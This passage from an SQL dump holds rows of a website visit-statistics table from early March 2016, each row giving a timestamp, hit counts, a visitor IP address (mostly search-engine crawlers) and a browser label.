ther'),(11114,1456837593,1,1,0,0,'93.158.152.26','other'),(11115,1456837597,1,1,0,0,'178.154.149.11','other'),(11116,1456837602,1,1,0,0,'130.193.51.81','other'),(11117,1456837606,1,1,0,0,'130.193.51.43','other'),(11118,1456837630,1,1,0,0,'141.8.184.11','other'),(11119,1456837639,1,1,0,0,'141.8.184.22','other'),(11120,1456837745,1,1,0,0,'62.210.215.100','chrome'),(11121,1456837921,1,1,0,0,'66.249.92.99','other'),(11122,1456838052,1,1,0,0,'195.242.179.206','firefox'),(11123,1456838200,1,1,0,0,'46.174.127.24','firefox'),(11124,1456838367,4,4,0,0,'130.193.51.102','other'),(11125,1456838376,2,2,0,0,'141.8.132.66','other'),(11126,1456838380,1,1,0,0,'130.193.51.91','other'),(11127,1456838450,1,1,0,0,'141.8.132.44','other'),(11128,1456838459,1,1,0,0,'130.193.51.50','other'),(11129,1456838464,1,1,0,0,'5.255.253.103','other'),(11130,1456838469,7,7,0,0,'141.8.142.8','other'),(11131,1456838474,1,1,0,0,'130.193.50.31','other'),(11132,1456838480,1,1,0,0,'141.8.132.48','other'),(11133,1456838485,1,1,0,0,'141.8.142.55','other'),(11134,1456838490,4,4,0,0,'5.255.253.53','other'),(11135,1456838502,1,1,0,0,'141.8.142.82','other'),(11136,1456838506,5,5,0,0,'141.8.142.41','other'),(11137,1456838511,6,6,0,0,'141.8.184.18','other'),(11138,1456838558,1,1,0,0,'91.196.178.163','firefox'),(11139,1456838726,3,0,3,0,'66.249.66.162',''),(11140,1456838732,1,1,0,0,'91.196.178.72','chrome'),(11141,1456838868,7,7,0,0,'130.193.37.21','other'),(11142,1456838872,4,4,0,0,'141.8.132.2','other'),(11143,1456838877,7,7,0,0,'141.8.142.10','other'),(11144,1456838885,1,1,0,0,'8.29.198.25','other'),(11145,1456838886,8,8,0,0,'5.255.253.55','other'),(11146,1456838898,6,6,0,0,'141.8.132.99','other'),(11147,1456838902,2,2,0,0,'130.193.51.45','other'),(11148,1456838910,5,5,0,0,'141.8.184.11','other'),(11149,1456838916,3,3,0,0,'5.255.253.9','other'),(11150,1456838919,5,5,0,0,'141.8.184.22','other'),(11151,1456838927,4,4,0,0,'5.255.253.30','other'),(11152,1456838931,3,3,0,0,'141.8.132.79','other'),(11153,1456838944,7,7,0,0,'141.8.183.14','other'),(11154,1456838948,1,1,0,0,'130.193.51.55','other'),(11155,1456838953,7,7,0,0,'5.255.253.100','other'),(11156,1456838961,5,5,0,0,'93.158.152.26','other'),(11157,1456838964,1,0,1,0,'66.249.66.166',''),(11158,1456838966,7,0,7,0,'66.249.66.158',''),(11159,1456838969,8,8,0,0,'141.8.132.97','other'),(11160,1456838990,3,3,0,0,'178.154.149.11','other'),(11161,1456838999,4,4,0,0,'93.158.152.9','other'),(11162,1456839016,5,5,0,0,'130.193.51.81','other'),(11163,1456839029,5,5,0,0,'130.193.37.27','other'),(11164,1456839033,5,5,0,0,'5.255.253.110','other'),(11165,1456839055,5,5,0,0,'130.193.51.43','other'),(11166,1456839080,2,2,0,0,'141.8.132.76','other'),(11167,1456839140,2,2,0,0,'5.255.253.10','other'),(11168,1456839193,1,1,0,0,'157.55.39.39','other'),(11169,1456839287,1,1,0,0,'130.193.51.102','other'),(11170,1456839300,3,3,0,0,'130.193.51.85','other'),(11171,1456839338,3,3,0,0,'141.8.142.88','other'),(11172,1456839629,1,1,0,0,'180.76.15.151','other'),(11173,1456839746,5,5,0,0,'91.209.51.22','other'),(11174,1456839980,1,1,0,0,'66.249.81.208','other'),(11175,1456840051,2,0,2,0,'66.249.66.158',''),(11176,1456840104,1,1,0,0,'5.255.253.10','other'),(11177,1456840829,1,1,0,0,'94.179.127.36','chrome'),(11178,1456840839,1,1,0,0,'130.193.51.81','other'),(11179,1456841063,10,0,10,0,'66.249.66.158',''),(11180,1456841177,3,3,0,0,'93.158.152.9','other'),(11181,1456841178,4,4,0,0,'5.255.253.10','other'),(11183,1456841388,2,2,0,0,'93.158.152.26','other'),(11185,1456841557,2,2,0,0,'130.193.51.43','other'),(11186,1456841660,1,1,0,0,'207.46.13.176','other'),(11187,1456841773,6,6,0,0,'130.193.51.91','other'),(11188,1456841776,1,1,0,0,'141.8.184.31','other'),(11189,1456841777,2,2,0,0,'141.8.142.8','other'),(11190,1456841790,1,1,0,0,'5.255.253.9','other'),(11191,1456841792,2,2,0,0,'141.8.132.76','other'),(11192,1456841793,1,1,0,0,'130.193.51.45','other'),(11193,1456841795,1,1,0,0,'5.255.253.110','other'),(11194,1456841796,2,2,0,0,'141.8.142.41','other'),(11195,1456841797,4,4,0,0,'141.8.132.99','other'),(11196,1456841798,3,3,0,0,'141.8.184.11','other'),(11197,1456841799,3,3,0,0,'5.255.253.30','other'),(11198,1456841800,3,3,0,0,'141.8.142.82','other'),(11199,1456841803,1,1,0,0,'141.8.132.109','other'),(11200,1456841804,2,2,0,0,'141.8.132.79','other'),(11201,1456841805,1,1,0,0,'157.55.39.250','other'),(11202,1456841807,3,3,0,0,'130.193.51.102','other'),(11203,1456841809,1,1,0,0,'93.158.152.81','other'),(11204,1456841810,3,3,0,0,'178.154.149.11','other'),(11205,1456841812,1,1,0,0,'5.255.253.55','other'),(11206,1456841814,1,1,0,0,'5.255.253.79','other'),(11207,1456841822,1,1,0,0,'130.193.51.85','other'),(11208,1456842228,2,0,2,0,'66.249.66.158',''),(11209,1456842276,1,1,0,0,'141.8.184.18','other'),(11210,1456842277,1,1,0,0,'5.255.253.10','other'),(11211,1456842303,1,1,0,0,'130.193.51.7','other'),(11212,1456842304,1,1,0,0,'93.158.152.26','other'),(11213,1456842305,1,1,0,0,'130.193.51.109','other'),(11214,1456842510,1,1,0,0,'91.196.178.167','firefox'),(11215,1456842537,2,2,0,0,'91.196.178.68','firefox'),(11216,1456842660,2,2,0,0,'178.154.149.9','other'),(11217,1456842868,1,1,0,0,'46.174.125.28','chrome'),(11218,1456842880,2,2,0,0,'130.193.51.102','other'),(11219,1456842881,3,3,0,0,'130.193.37.27','other'),(11220,1456842893,1,1,0,0,'66.249.66.158','other'),(11221,1456842998,1,1,0,0,'157.55.39.106','other'),(11222,1456843105,1,1,0,0,'141.8.132.76','other'),(11223,1456843107,3,3,0,0,'141.8.183.14','other'),(11224,1456843108,2,2,0,0,'130.193.51.45','other'),(11225,1456843221,3,3,0,0,'141.8.132.99','other'),(11226,1456843228,1,1,0,0,'130.193.51.7','other'),(11228,1456843229,4,4,0,0,'93.158.152.26','other'),(11229,1456843279,1,1,0,0,'141.8.142.82','other'),(11230,1456843280,1,1,0,0,'178.154.149.11','other'),(11231,1456843281,1,1,0,0,'5.255.253.55','other'),(11232,1456843323,2,2,0,0,'93.158.152.9','other'),(11233,1456843324,3,3,0,0,'130.193.51.81','other'),(11234,1456843325,1,1,0,0,'141.8.142.88','other'),(11235,1456843326,1,1,0,0,'141.8.132.79','other'),(11236,1456843327,1,1,0,0,'178.154.189.6','other'),(11237,1456843475,1,1,0,0,'92.113.174.126','firefox'),(11238,1456843554,2,2,0,0,'5.255.253.9','other'),(11239,1456843583,1,1,0,0,'82.207.119.87','opera'),(11240,1456843756,5,5,0,0,'141.8.184.11','other'),(11241,1456843758,5,5,0,0,'141.8.142.41','other'),(11242,1456843762,1,1,0,0,'93.158.152.81','other'),(11243,1456843861,1,1,0,0,'91.214.211.66','chrome'),(11244,1456843909,1,1,0,0,'178.154.189.204','other'),(11245,1456844025,1,1,0,0,'130.193.51.45','other'),(11246,1456844026,1,1,0,0,'141.8.132.48','other'),(11247,1456844027,2,2,0,0,'5.255.253.30','other'),(11248,1456844124,4,4,0,0,'141.8.183.14','other'),(11249,1456844128,3,3,0,0,'141.8.132.76','other'),(11250,1456844129,6,6,0,0,'178.154.189.12','other'),(11251,1456844163,1,1,0,0,'94.179.44.224','firefox'),(11252,1456844225,4,0,4,0,'66.249.66.158',''),(11253,1456844471,3,3,0,0,'130.193.51.85','other'),(11254,1456844472,2,2,0,0,'141.8.132.99','other'),(11255,1456844473,4,4,0,0,'5.255.253.9','other'),(11256,1456844474,5,5,0,0,'5.255.253.55','other'),(11257,1456844480,2,2,0,0,'5.255.253.10','other'),(11258,1456844481,2,2,0,0,'141.8.142.88','other'),(11259,1456844482,4,4,0,0,'141.8.142.8','other'),(11260,1456844483,1,1,0,0,'141.8.132.44','other'),(11261,1456844486,2,2,0,0,'130.193.51.109','other'),(11262,1456844487,4,4,0,0,'93.158.152.26','other'),(11263,1456844488,5,5,0,0,'5.255.253.110','other'),(11264,1456844490,3,3,0,0,'93.158.152.9','other'),(11265,1456844499,1,1,0,0,'5.255.253.53','other'),(11266,1456844510,3,3,0,0,'130.193.51.81','other'),(11267,1456844511,1,1,0,0,'141.8.142.55','other'),(11269,1456844524,2,2,0,0,'130.193.51.102','other'),(11270,1456844531,1,1,0,0,'141.8.184.18','other'),(11271,1456844535,2,2,0,0,'141.8.132.74','other'),(11272,1456844536,1,1,0,0,'141.8.142.10','other'),(11274,1456844537,1,1,0,0,'141.8.184.22','other'),(11275,1456844539,1,1,0,0,'141.8.132.79','other'),(11276,1456844550,1,1,0,0,'141.8.132.2','other'),(11277,1456844581,2,2,0,0,'5.255.253.103','other'),(11278,1456844649,1,1,0,0,'180.76.15.139','other'),(11279,1456844940,1,1,0,0,'91.196.178.68','firefox'),(11280,1456845128,1,0,1,0,'66.249.66.129',''),(11281,1456845156,1,1,0,0,'5.255.253.30','other'),(11282,1456845224,2,2,0,0,'141.8.132.76','other'),(11283,1456845236,1,1,0,0,'178.154.149.9','other'),(11285,1456845237,1,1,0,0,'130.193.51.43','other'),(11286,1456845294,1,1,0,0,'141.8.142.82','other'),(11287,1456845393,1,1,0,0,'5.255.253.10','other'),(11288,1456845397,1,1,0,0,'141.8.132.109','other'),(11289,1456845426,1,1,0,0,'91.196.178.69','chrome'),(11290,1456845530,1,0,1,0,'68.180.229.232',''),(11291,1456845717,2,0,2,0,'66.249.66.158',''),(11292,1456846001,1,1,0,0,'5.45.192.70','chrome'),(11293,1456846191,3,3,0,0,'178.154.149.11','other'),(11294,1456846192,2,2,0,0,'5.255.253.9','other'),(11295,1456846193,1,1,0,0,'5.255.253.110','other'),(11296,1456846352,3,3,0,0,'93.158.152.26','other'),(11297,1456846599,2,2,0,0,'5.255.253.55','other'),(11299,1456846606,1,1,0,0,'141.8.132.76','other'),(11300,1456846611,3,3,0,0,'130.193.51.43','other'),(11301,1456846615,3,3,0,0,'141.8.142.8','other'),(11302,1456846964,1,1,0,0,'66.249.66.190','other'),(11303,1456847007,3,3,0,0,'141.8.142.41','other'),(11304,1456847008,1,1,0,0,'5.255.253.62','other'),(11305,1456847009,1,1,0,0,'141.8.184.6','other'),(11306,1456847011,4,4,0,0,'5.255.253.17','other'),(11308,1456847012,4,4,0,0,'93.158.152.9','other'),(11309,1456847015,2,2,0,0,'130.193.51.102','other'),(11310,1456847016,3,3,0,0,'141.8.132.109','other'),(11311,1456847017,1,1,0,0,'141.8.184.31','other'),(11312,1456847018,2,2,0,0,'141.8.184.18','other'),(11313,1456847020,4,4,0,0,'130.193.51.81','other'),(11314,1456847021,4,4,0,0,'5.255.253.30','other'),(11315,1456847022,2,2,0,0,'141.8.132.79','other'),(11316,1456847026,1,1,0,0,'141.8.142.55','other'),(11317,1456847029,2,2,0,0,'141.8.183.14','other'),(11319,1456847031,2,2,0,0,'141.8.142.88','other'),(11320,1456847033,2,2,0,0,'5.255.253.103','other'),(11322,1456847036,2,2,0,0,'130.193.51.45','other'),(11323,1456847039,1,1,0,0,'141.8.132.74','other'),(11324,1456847043,1,1,0,0,'141.8.184.11','other'),(11325,1456847050,1,1,0,0,'141.8.132.99','other'),(11326,1456847051,1,1,0,0,'141.8.132.97','other'),(11327,1456847107,14,0,14,0,'66.249.66.158',''),(11328,1456847164,1,1,0,0,'46.201.240.112','firefox'),(11329,1456847312,5,1,4,0,'66.249.66.158',''),(11330,1456847437,1,1,0,0,'91.196.178.97','chrome'),(11331,1456847438,1,1,0,0,'5.45.192.70','chrome'),(11332,1456847531,1,1,0,0,'5.255.253.9','other'),(11333,1456848072,1,1,0,0,'62.210.215.100','chrome'),(11334,1456848151,1,1,0,0,'5.255.253.100','other'),(11335,1456848153,1,1,0,0,'5.255.253.53','other'),(11336,1456848216,1,0,1,0,'68.180.229.232',''),(11337,1456848513,1,1,0,0,'93.158.152.26','other'),(11338,1456848523,1,1,0,0,'157.55.39.39','other'),(11339,1456848660,1,1,0,0,'66.249.92.95','other'),(11340,1456849045,1,1,0,0,'5.45.192.70','chrome'),(11341,1456849548,10,0,10,0,'66.249.66.158',''),(11342,1456849600,1,1,0,0,'178.92.75.12','firefox'),(11343,1456849744,1,1,0,0,'8.29.198.25','other'),(11344,1456849828,4,1,3,0,'66.249.66.158',''),(11345,1456849875,1,1,0,0,'79.143.180.15','other'),(11346,1456849939,3,3,0,0,'178.154.189.204','other'),(11347,1456850224,1,1,0,0,'5.255.253.10','other'),(11349,1456850225,1,1,0,0,'5.255.253.9','other'),(11350,1456850226,1,1,0,0,'130.193.51.81','other'),(11351,1456850228,1,1,0,0,'5.255.253.110','other'),(11353,1456850229,1,1,0,0,'141.8.132.76','other'),(11354,1456850230,1,1,0,0,'141.8.142.41','other'),(11356,1456850231,1,1,0,0,'178.154.149.11','other'),(11357,1456850232,1,1,0,0,'93.158.152.9','other'),(11358,1456850233,1,1,0,0,'141.8.132.99','other'),(11359,1456850344,15,15,0,0,'136.243.5.87','other'),(11360,1456850454,2,0,2,0,'66.249.78.144',''),(11361,1456850959,1,1,0,0,'178.154.189.204','other'),(11362,1456851051,8,1,7,0,'66.249.78.144',''),(11363,1456851337,1,0,1,0,'68.180.229.232',''),(11364,1456851362,1,1,0,0,'92.113.174.126','firefox'),(11365,1456851904,1,1,0,0,'180.76.15.7','other'),(11366,1456852103,2,1,1,0,'66.249.78.144',''),(11367,1456852240,15,15,0,0,'178.154.149.11','other'),(11368,1456852241,8,8,0,0,'93.158.152.9','other'),(11369,1456852243,14,14,0,0,'141.8.183.14','other'),(11370,1456852257,1,1,0,0,'217.69.136.209','other'),(11371,1456852723,7,7,0,0,'141.8.184.18','other'),(11372,1456852734,2,2,0,0,'130.193.37.21','other'),(11373,1456852737,7,7,0,0,'5.255.253.53','other'),(11374,1456853030,6,0,6,0,'66.249.78.144',''),(11375,1456853327,1,1,0,0,'37.52.121.77','chrome'),(11376,1456853359,3,3,0,0,'141.8.183.14','other'),(11377,1456853595,1,1,0,0,'207.46.13.176','other'),(11378,1456853677,1,0,1,0,'66.249.66.158',''),(11379,1456853706,4,4,0,0,'141.8.184.18','other'),(11381,1456853812,2,2,0,0,'178.154.149.11','other'),(11382,1456853813,2,2,0,0,'130.193.37.21','other'),(11383,1456853815,2,2,0,0,'93.158.152.9','other'),(11385,1456853817,1,1,0,0,'5.255.253.100','other'),(11386,1456853951,1,0,1,0,'66.249.79.181',''),(11387,1456854002,1,1,0,0,'136.243.48.85','chrome'),(11388,1456854568,1,0,1,0,'66.249.78.144',''),(11389,1456854569,2,1,1,0,'66.249.78.144',''),(11390,1456854639,1,1,0,0,'141.8.184.18','other'),(11391,1456854870,1,1,0,0,'141.8.184.11','other'),(11392,1456855321,3,3,0,0,'141.8.142.88','other'),(11393,1456855345,2,2,0,0,'130.193.51.102','other'),(11394,1456855845,2,2,0,0,'130.193.51.85','other'),(11396,1456855846,1,1,0,0,'91.196.178.133','chrome'),(11397,1456855862,12,12,0,0,'141.8.183.14','other'),(11398,1456855863,2,2,0,0,'141.8.132.99','other'),(11399,1456855864,1,1,0,0,'130.193.51.43','other'),(11400,1456855865,1,1,0,0,'93.158.152.26','other'),(11402,1456855867,1,1,0,0,'141.8.132.97','other'),(11403,1456855868,2,2,0,0,'141.8.132.76','other'),(11404,1456855869,1,1,0,0,'141.8.132.79','other'),(11405,1456855870,19,19,0,0,'178.154.149.11','other'),(11406,1456855871,14,14,0,0,'93.158.152.9','other'),(11407,1456855875,1,1,0,0,'141.8.132.2','other'),(11408,1456855876,1,1,0,0,'141.8.184.22','other'),(11409,1456855879,1,1,0,0,'141.8.142.41','other'),(11410,1456855880,23,23,0,0,'141.8.184.18','other'),(11411,1456855891,6,6,0,0,'5.255.253.53','other'),(11412,1456855960,1,1,0,0,'130.193.37.21','other'),(11413,1456856129,2,2,0,0,'70.35.202.197','firefox'),(11414,1456856135,2,2,0,0,'70.35.202.197','other'),(11415,1456856783,1,0,1,0,'66.249.66.158',''),(11416,1456857072,2,1,1,0,'66.249.66.158',''),(11417,1456857200,8,8,0,0,'109.87.138.56','other'),(11418,1456857507,7,0,7,0,'66.249.78.144',''),(11419,1456857591,1,1,0,0,'91.196.178.166','chrome'),(11420,1456857700,1,1,0,0,'37.53.89.22','chrome'),(11421,1456857727,8,8,0,0,'141.8.184.18','other'),(11422,1456857765,5,1,4,0,'66.249.78.144',''),(11423,1456857982,1,1,0,0,'95.135.91.11','chrome'),(11424,1456858158,1,1,0,0,'66.249.66.190','other'),(11425,1456858245,4,1,3,0,'66.249.78.144',''),(11426,1456858253,1,0,1,0,'66.249.66.158',''),(11427,1456858351,1,1,0,0,'78.111.187.231','chrome'),(11428,1456858423,3,1,2,0,'66.249.78.144',''),(11429,1456858526,12,12,0,0,'178.154.149.11','other'),(11430,1456858527,9,9,0,0,'141.8.132.99','other'),(11431,1456858528,11,11,0,0,'5.255.253.53','other'),(11433,1456858532,7,7,0,0,'93.158.152.9','other'),(11434,1456858533,11,11,0,0,'141.8.183.14','other'),(11435,1456858536,9,9,0,0,'130.193.37.21','other'),(11436,1456858543,1,1,0,0,'130.193.51.45','other'),(11437,1456858628,1,1,0,0,'5.255.253.100','other'),(11438,1456858629,2,2,0,0,'141.8.184.18','other'),(11439,1456858688,1,1,0,0,'78.111.190.32','chrome'),(11440,1456858801,3,1,2,0,'66.249.78.144',''),(11441,1456858934,1,1,0,0,'62.210.215.100','chrome'),(11442,1456859255,1,1,0,0,'130.180.211.175','chrome'),(11443,1456859617,4,1,3,0,'66.249.66.158',''),(11444,1456859744,1,1,0,0,'66.249.92.95','other'),(11445,1456859828,2,0,2,0,'68.180.229.232',''),(11446,1456859959,3,0,3,0,'66.249.78.144',''),(11447,1456860131,5,0,5,0,'66.249.78.37',''),(11448,1456860274,5,0,5,0,'66.249.78.30',''),(11449,1456860600,1,1,0,0,'8.29.198.26','other'),(11450,1456860647,19,1,18,0,'66.249.78.144',''),(11451,1456860802,8,0,8,0,'66.249.66.158',''),(11452,1456860853,1,0,1,0,'66.249.66.129',''),(11453,1456860962,1,1,0,0,'178.154.149.11','other'),(11455,1456860963,1,1,0,0,'141.8.142.8','other'),(11456,1456861092,12,1,11,0,'66.249.78.144',''),(11457,1456861107,2,0,2,0,'66.249.78.53',''),(11458,1456861110,1,1,0,0,'66.249.78.53','other'),(11459,1456861358,3,0,3,0,'66.249.78.30',''),(11460,1456861470,1,0,1,0,'66.249.66.190',''),(11461,1456861592,2,2,0,0,'95.213.141.126','opera'),(11462,1456861594,1,1,0,0,'78.111.190.32','chrome'),(11463,1456861829,1,1,0,0,'207.46.13.176','other'),(11464,1456862179,1,1,0,0,'180.76.15.135','other'),(11465,1456862247,1,1,0,0,'93.158.152.26','other'),(11466,1456862248,1,1,0,0,'141.8.142.10','other'),(11467,1456862249,1,1,0,0,'5.255.253.9','other'),(11468,1456862250,1,1,0,0,'5.255.253.55','other'),(11470,1456862251,1,1,0,0,'130.193.37.27','other'),(11471,1456862252,7,7,0,0,'141.8.183.14','other'),(11472,1456862253,6,6,0,0,'93.158.152.9','other'),(11473,1456862254,2,2,0,0,'178.154.149.11','other'),(11474,1456862257,1,1,0,0,'5.255.253.53','other'),(11475,1456862258,5,5,0,0,'141.8.184.18','other'),(11476,1456862302,3,2,1,0,'66.249.78.30',''),(11477,1456862669,3,0,3,0,'66.249.78.144',''),(11478,1456862694,1,1,0,0,'66.249.66.190','other'),(11479,1456862961,3,1,2,0,'66.249.78.144',''),(11480,1456863317,3,3,0,0,'80.91.162.99','other'),(11481,1456863857,5,5,0,0,'173.234.159.250','other'),(11482,1456863934,2,0,2,0,'66.249.78.144',''),(11483,1456863943,1,1,0,0,'141.8.184.18','other'),(11484,1456865095,4,0,4,0,'66.249.78.144',''),(11485,1456865114,1,1,0,0,'217.69.133.250','other'),(11486,1456865220,1,1,0,0,'66.249.81.211','other'),(11487,1456866338,4,1,3,0,'66.249.78.144',''),(11488,1456866598,1,0,1,0,'66.249.78.44',''),(11489,1456867000,1,1,0,0,'180.76.15.9','other'),(11490,1456867132,3,3,0,0,'162.210.196.129','other'),(11491,1456867161,1,0,1,0,'68.180.229.232',''),(11492,1456867246,7,0,7,0,'66.249.78.144',''),(11493,1456867332,1,0,1,0,'66.249.66.158',''),(11494,1456867435,1,1,0,0,'5.255.253.30','other'),(11496,1456867436,1,1,0,0,'5.255.253.53','other'),(11497,1456868392,1,0,1,0,'66.249.78.144',''),(11498,1456868635,12,1,11,0,'66.249.78.144',''),(11499,1456868867,1,1,0,0,'66.249.81.208','other'),(11500,1456869102,4,4,0,0,'141.8.183.14','other'),(11501,1456869243,4,0,4,0,'66.249.66.158',''),(11502,1456869585,8,0,8,0,'66.249.78.144',''),(11503,1456869603,5,5,0,0,'82.193.127.15','other'),(11504,1456869672,1,1,0,0,'141.8.132.99','other'),(11505,1456869673,1,1,0,0,'130.193.51.45','other'),(11506,1456869674,2,2,0,0,'130.193.37.21','other'),(11507,1456869676,2,2,0,0,'178.154.149.11','other'),(11508,1456869678,1,1,0,0,'5.255.253.100','other'),(11509,1456869680,1,1,0,0,'93.158.152.9','other'),(11511,1456869682,2,2,0,0,'5.255.253.53','other'),(11512,1456870035,2,0,2,0,'68.180.229.232',''),(11513,1456870159,4,4,0,0,'80.91.162.99','other'),(11514,1456870588,1,1,0,0,'157.55.39.39','other'),(11515,1456870840,1,1,0,0,'66.249.92.95','other'),(11516,1456871105,1,0,1,0,'66.249.78.144',''),(11517,1456871445,1,1,0,0,'8.29.198.25','other'),(11518,1456871547,4,4,0,0,'82.193.127.15','other'),(11519,1456871571,1,1,0,0,'217.69.133.6','other'),(11520,1456871762,2,1,1,0,'66.249.78.144',''),(11521,1456871785,1,1,0,0,'178.154.189.204','other'),(11522,1456871852,1,1,0,0,'93.158.152.9','other'),(11523,1456871853,1,1,0,0,'141.8.183.14','other'),(11525,1456871854,2,2,0,0,'141.8.184.18','other'),(11526,1456871989,1,1,0,0,'130.193.37.21','other'),(11527,1456871990,1,1,0,0,'5.255.253.100','other'),(11528,1456872078,1,1,0,0,'217.69.133.216','other'),(11529,1456872845,2,0,2,0,'66.249.78.144',''),(11530,1456872890,1,1,0,0,'51.255.65.58','other'),(11531,1456873201,1,1,0,0,'141.8.184.18','other'),(11532,1456873609,1,0,1,0,'68.180.229.232',''),(11533,1456873980,1,0,1,0,'66.249.78.30',''),(11534,1456874183,7,7,0,0,'130.193.37.21','other'),(11535,1456874393,2,2,0,0,'141.8.132.99','other'),(11536,1456874394,1,1,0,0,'130.193.51.45','other'),(11537,1456874395,4,4,0,0,'141.8.183.14','other'),(11538,1456874396,3,3,0,0,'178.154.149.11','other'),(11539,1456874397,4,4,0,0,'141.8.184.18','other'),(11540,1456874404,1,1,0,0,'93.158.152.9','other'),(11541,1456874421,1,1,0,0,'5.255.253.53','other'),(11542,1456874454,8,8,0,0,'157.55.39.106','other'),(11543,1456874462,6,6,0,0,'157.55.39.250','other'),(11544,1456874624,2,2,0,0,'207.46.13.176','other'),(11545,1456874707,1,0,1,0,'66.249.78.144',''),(11546,1456874801,5,1,4,0,'66.249.78.144',''),(11547,1456875020,1,0,1,0,'66.249.78.37',''),(11548,1456875510,3,3,0,0,'136.243.103.156','other'),(11549,1456875737,7,0,7,0,'66.249.78.144',''),(11550,1456876000,1,1,0,0,'66.249.81.211','other'),(11551,1456876347,1,0,1,0,'66.249.78.30',''),(11552,1456876450,1,0,1,0,'66.249.78.37',''),(11553,1456876646,3,0,3,0,'66.249.66.158',''),(11554,1456876662,4,0,4,0,'66.249.78.144',''),(11555,1456876966,1,1,0,0,'207.46.13.176','other'),(11556,1456877618,1,1,0,0,'217.69.133.252','other'),(11557,1456877757,2,2,0,0,'157.55.39.106','other'),(11558,1456878283,4,0,4,0,'66.249.78.144',''),(11559,1456878335,2,0,2,0,'66.249.78.60',''),(11560,1456878499,1,0,1,0,'66.249.78.37',''),(11561,1456878629,2,2,0,0,'82.193.127.15','other'),(11562,1456879226,1,0,1,0,'66.249.78.144',''),(11563,1456879350,2,2,0,0,'66.249.78.144','other'),(11564,1456879533,2,2,0,0,'82.193.127.15','other'),(11565,1456879613,1,1,0,0,'5.255.253.94','other'),(11566,1456879617,1,1,0,0,'141.8.132.66','other'),(11567,1456879775,1,1,0,0,'157.55.39.85','other'),(11568,1456879913,1,1,0,0,'66.249.78.37','other'),(11569,1456879975,2,2,0,0,'130.193.51.85','other'),(11570,1456879979,1,1,0,0,'141.8.142.60','other'),(11571,1456879983,1,1,0,0,'130.193.51.55','other'),(11572,1456879987,1,1,0,0,'141.8.142.82','other'),(11573,1456879992,1,1,0,0,'141.8.142.10','other'),(11574,1456879996,1,1,0,0,'141.8.142.88','other'),(11575,1456880419,1,0,1,0,'66.249.78.144',''),(11576,1456880510,3,1,2,0,'66.249.78.144',''),(11577,1456881670,3,3,0,0,'141.8.142.41','other'),(11578,1456881674,1,1,0,0,'130.193.50.31','other'),(11579,1456881678,1,1,0,0,'130.193.51.55','other'),(11580,1456881683,1,1,0,0,'141.8.142.60','other'),(11581,1456881687,1,1,0,0,'5.255.253.51','other'),(11582,1456881691,1,1,0,0,'141.8.142.10','other'),(11583,1456881696,1,1,0,0,'93.158.152.65','other'),(11584,1456881700,1,1,0,0,'130.193.51.81','other'),(11585,1456881704,1,1,0,0,'141.8.132.74','other'),(11586,1456881709,1,1,0,0,'5.255.253.89','other'),(11587,1456881904,1,1,0,0,'66.249.92.95','other'),(11588,1456882019,1,1,0,0,'130.193.51.109','other'),(11589,1456882023,1,1,0,0,'5.255.253.10','other'),(11590,1456882028,1,1,0,0,'5.255.253.9','other'),(11591,1456882216,1,1,0,0,'66.249.78.44','other'),(11592,1456882300,1,1,0,0,'8.29.198.25','other'),(11593,1456882435,1,0,1,0,'66.249.78.144',''),(11594,1456883043,1,0,1,0,'68.180.229.232',''),(11595,1456883122,1,1,0,0,'157.55.39.106','other'),(11596,1456883388,1,1,0,0,'157.55.39.85','other'),(11597,1456883571,3,0,3,0,'66.249.78.144',''),(11598,1456883589,2,0,2,0,'66.249.66.158',''),(11599,1456883877,2,2,0,0,'66.249.78.144','other'),(11600,1456883963,1,1,0,0,'130.193.51.50','other'),(11601,1456883967,1,1,0,0,'130.193.51.102','other'),(11602,1456883972,1,1,0,0,'141.8.142.60','other'),(11603,1456884225,1,0,1,0,'68.180.229.232',''),(11604,1456884313,1,1,0,0,'141.8.132.48','other'),(11605,1456884317,1,1,0,0,'130.193.51.81','other'),(11606,1456884322,1,1,0,0,'141.8.142.88','other'),(11607,1456884326,1,1,0,0,'5.255.253.51','other'),(11608,1456884331,1,1,0,0,'141.8.142.55','other'),(11609,1456885058,1,0,1,0,'66.249.78.37',''),(11610,1456885454,3,2,1,0,'66.249.78.144',''),(11611,1456885547,4,3,1,0,'66.249.78.144',''),(11612,1456885738,1,0,1,0,'66.249.66.158',''),(11613,1456885823,2,0,2,0,'68.180.229.232',''),(11614,1456885860,1,1,0,0,'217.69.133.251','other'),(11615,1456885915,1,1,0,0,'82.193.127.15','other'),(11616,1456885979,1,1,0,0,'141.8.132.66','other'),(11617,1456885983,1,1,0,0,'130.193.51.50','other'),(11618,1456885989,1,1,0,0,'5.255.253.10','other'),(11619,1456885992,1,1,0,0,'178.154.189.6','other'),(11620,1456885996,1,1,0,0,'5.255.253.62','other'),(11621,1456886316,1,1,0,0,'180.76.15.140','other'),(11622,1456886620,1,1,0,0,'141.8.132.79','other'),(11623,1456886622,1,0,1,0,'66.249.78.44',''),(11624,1456886624,1,1,0,0,'130.193.51.85','other'),(11625,1456886629,2,2,0,0,'178.154.149.11','other'),(11626,1456886633,1,1,0,0,'93.158.152.9','other'),(11627,1456886637,1,1,0,0,'130.193.37.21','other'),(11628,1456886642,1,1,0,0,'130.193.51.45','other'),(11629,1456886646,1,1,0,0,'141.8.132.2','other'),(11630,1456886693,4,0,4,0,'66.249.78.144',''),(11631,1456886862,2,2,0,0,'82.193.127.15','other'),(11632,1456887087,1,0,1,0,'66.249.66.129',''),(11633,1456887128,3,3,0,0,'66.249.78.144','other'),(11634,1456887410,1,1,0,0,'141.8.142.8','other'),(11635,1456887933,1,0,1,0,'68.180.229.232',''),(11636,1456888119,3,2,1,0,'66.249.78.144',''),(11637,1456888226,1,1,0,0,'130.193.37.27','other'),(11638,1456888230,1,1,0,0,'141.8.142.41','other'),(11639,1456888235,2,2,0,0,'130.193.51.85','other'),(11640,1456888436,1,1,0,0,'5.255.253.10','other'),(11641,1456888440,1,1,0,0,'130.193.51.102','other'),(11642,1456888449,1,1,0,0,'141.8.132.99','other'),(11643,1456888453,1,1,0,0,'93.158.152.26','other'),(11644,1456888525,1,1,0,0,'91.250.41.130','chrome'),(11645,1456888526,1,1,0,0,'31.202.212.95','chrome'),(11646,1456889890,9,9,0,0,'141.8.184.18','other'),(11647,1456889902,3,1,2,0,'66.249.78.144',''),(11648,1456889909,1,1,0,0,'178.154.149.11','other'),(11649,1456890001,2,2,0,0,'207.46.13.176','other'),(11650,1456890651,1,0,1,0,'66.249.66.162',''),(11651,1456891547,6,0,6,0,'66.249.78.144',''),(11652,1456891670,1,1,0,0,'93.158.152.81','other'),(11653,1456891672,1,0,1,0,'66.249.66.158',''),(11654,1456891675,1,1,0,0,'141.8.132.74'